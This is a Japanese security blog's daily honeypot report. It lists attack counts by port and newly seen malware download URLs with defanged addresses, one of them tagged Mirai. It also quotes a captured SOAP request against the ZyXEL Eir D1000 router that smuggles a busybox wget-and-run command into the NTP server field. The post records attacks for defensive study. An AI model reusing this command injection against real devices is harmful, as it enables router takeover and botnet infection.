sec-chick Blog

サイバーセキュリティブログ

【ハニーポット簡易分析】Honeytrap簡易分析(242日目:4/12)

Honeytrap簡易分析(242日目:4/12)の簡易分析となります。
※80ポートは除く

f:id:one-chick-sec:20190413220037p:plain

f:id:one-chick-sec:20190413220123p:plain

<宛先ポート別検知数>

宛先ポート 検知数 サービス例
445 2471 SMB
2222 110 SSH
139 74 NetBIOS
3389 71 RDP
27017 68 ?
8080 65 PROXY
22223 64 SSH
222 58 SSH
81 55 GoAhead Web Server
22222 53 SSH


<新規マルウェアダウンロード>

ポート マルウェアダウンロード先 HTTPリクエストパス VT 備考
5555 hxxp://209[.]141[.]50[.]26/d POST /UD/?5 

VirusTotal

 
8080 hxxp://165[.]22[.]136[.]161/vb/mpsl POST /tmUnblock.cgi 

VirusTotal

 
37215 hxxp://188[.]166[.]102[.]198/EREBUS[.]sh POST /ctrlt/DeviceUpgrade_1  VirusTotal  
52869 hxxp://128[.]199[.]62[.]7/Pemex[.]sh POST /picsdesc.xml  VirusTotal

Mirai

52869 hxxp://185[.]244[.]25[.]193/Corona[.]mips

POST /picsdesc.xml

VirusTotal  


<気になった通信>
POST /UD/?5 HTTP/1.1
Host: xxx.xxx.xxx.xxx:5555
User-Agent: python-requests/2.12.4
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers


<?xml version="1.0"..<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">.. <NewNTPServer1>`cd /tmp; /bin/busybox wget hxxp://xxx.xxx.xxx.xxx/d; sh d`</NewNTPServer1>.. <NewNTPServer2></NewNTPServer2>
<NewNTPServer3></NewNTPServer3>
<NewNTPServer4></NewNTPServer4>
<NewNTPServer5></NewNTPServer5>
</u:SetNTPServers>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>

ZyXEL 社の Eir D1000 Wireless Router の管理画面における脆弱性であり、wgetコマンドでマルウェアをダウンロードを行う攻撃です。
マルウェアの種類までは特定できなかったですが、おそらくMiraiやGafgytなどのマルウェアと推測されます。

<参考情報>
https://devicereversing.wordpress.com/2016/11/07/eirs-d1000-modem-is-wide-open-to-being-hacked/

以上となります。